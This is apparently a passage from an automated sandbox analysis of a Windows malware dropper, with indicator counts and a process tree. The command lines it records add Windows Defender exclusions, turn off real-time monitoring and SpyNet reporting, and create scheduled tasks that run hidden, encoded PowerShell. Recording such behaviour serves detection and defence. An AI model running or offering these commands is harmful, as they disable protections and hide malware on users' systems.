cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	RbbMELy.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXERbbMELy.exe

pid	process
1704	powershell.EXE
1704	powershell.EXE
1704	powershell.EXE
572	powershell.EXE
572	powershell.EXE
572	powershell.EXE
1468	powershell.EXE
1468	powershell.EXE
1468	powershell.EXE
1824	powershell.EXE
1824	powershell.EXE
1824	powershell.EXE
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe
1144	RbbMELy.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1704	powershell.EXE
Token: SeDebugPrivilege	572	powershell.EXE
Token: SeDebugPrivilege	1468	powershell.EXE
Token: SeDebugPrivilege	1824	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 1696 wrote to memory of 980	1696	file.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 980 wrote to memory of 1160	980	Install.exe	Install.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 572	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 1160 wrote to memory of 1196	1160	Install.exe	forfiles.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 572 wrote to memory of 1476	572	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1196 wrote to memory of 1152	1196	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1476 wrote to memory of 1468	1476	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1536	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1092	1152	cmd.exe	reg.exe
PID 1476 wrote to memory of 1920	1476	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696

C:\Users\Admin\AppData\Local\Temp\7zS704.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:980

C:\Users\Admin\AppData\Local\Temp\7zSA8C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1476

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1468

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1920

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1152

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:1536

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1092

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqOBNPnIu" /SC once /ST 02:08:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1932

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqOBNPnIu"
4⤵
PID:1604

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqOBNPnIu"
4⤵
PID:544

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 19:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\DoLwXEq.exe\" 3x /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:320

C:\Windows\system32\taskeng.exe
taskeng.exe {D074EC3F-EDFF-4460-A96B-706EF6EAC802} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1764

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:900

C:\Windows\system32\taskeng.exe
taskeng.exe {72E2EBE0-9C8A-4C10-8BC1-85D88B0F339D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\DoLwXEq.exe
C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\DoLwXEq.exe 3x /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1016

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFfghUllv" /SC once /ST 13:32:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1976

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFfghUllv"
3⤵
PID:1620

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFfghUllv"
3⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:2016

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:944

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1120

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1660

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRDpNhdlJ" /SC once /ST 17:17:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1224

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRDpNhdlJ"
3⤵
PID:364

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRDpNhdlJ"
3⤵
PID:1048

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:432

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:904

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1580

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1404

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1120

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\MYjwJFnMfsmfKHMw\YyWjTRwt\bGiMjLKxTfOFZtHS.wsf"
3⤵
PID:1204

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\MYjwJFnMfsmfKHMw\YyWjTRwt\bGiMjLKxTfOFZtHS.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1536

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gReUJCtHD" /SC once /ST 15:13:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1496

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gReUJCtHD"
3⤵
PID:1296

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gReUJCtHD"
3⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:1952

